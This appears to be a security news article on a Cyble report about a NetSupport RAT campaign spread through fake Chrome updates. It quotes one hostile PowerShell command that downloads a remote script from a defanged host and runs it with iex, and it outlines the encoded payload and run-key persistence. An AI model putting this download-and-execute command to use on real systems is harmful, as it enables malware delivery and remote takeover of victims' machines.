Security experts at the Cyble Research and Intelligence Labs (CRIL) reported a NetSupport (RAT) campaign run by the notorious SocGholish trojan gang. The trojan was being distributed to victims via a fake Google Chrome browser update.
However, in the campaign reported by Cyble, the perpetrators allegedly lured users to a Chrome update using a drive-by-download mechanism. Once the user visited the fake download page, the hacker pursued them to download the update, which looked identical to the standard Chrome browser updates.
Cyble analyzes the NetSupport (RAT) campaign
Once downloaded, the threat actor deployed an array of trojan and malware attacks, such as Cobalt Strike framework, ransomware, and others.
The download.zip file used the following PowerShell command to download a new PowerShell script and invokes it using Invoke-Expression (iex). “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -w h -c “iwr -usebasicparsing hxxp://aeoi[.]pl/15.ico |iex”
Upon further investigation, Cyble researchers found that the new PowerShell script was encoded with Base64, an encoding format for binary data designed to deal with ASCII. It was encoded with the [System.Convert]::FromBase64String method, and used a gzip decompression with a [System.IO.Compression.CompressionMode]::Decompress method.
Once decoded from the Base64 encoding, the file with an embedded payloads inside it used a deployment code for the “NetSupport RAT” application “whost.exe.” On being deployed, it dropped the payload, and the PowerShell script created a run entry for the “whost.exe” to start whenever the user logged into the system.
About NetSupport (RAT)
NetSupport Manager is a common RAT (Remote Administration Tool), available on underground hacking forums, and has been used previously to provide remote computer assistance to users— similar to other applications like TeamViewer, AnyDesk, and Quick Assist.
However, cybercriminals seem to have gotten used to NetSupport Manager as their primary tool to target victims using remote access. The RAT version of the program has been decentralized and used for internet-based cybercrime campaigns.
According to the post shared by Cyble, the NetSupport (RAT) can perform various malicious activities on the victim’s devices, including launching applications remotely, identifying crucial data on hard drives and networks as well as retrieving systems information.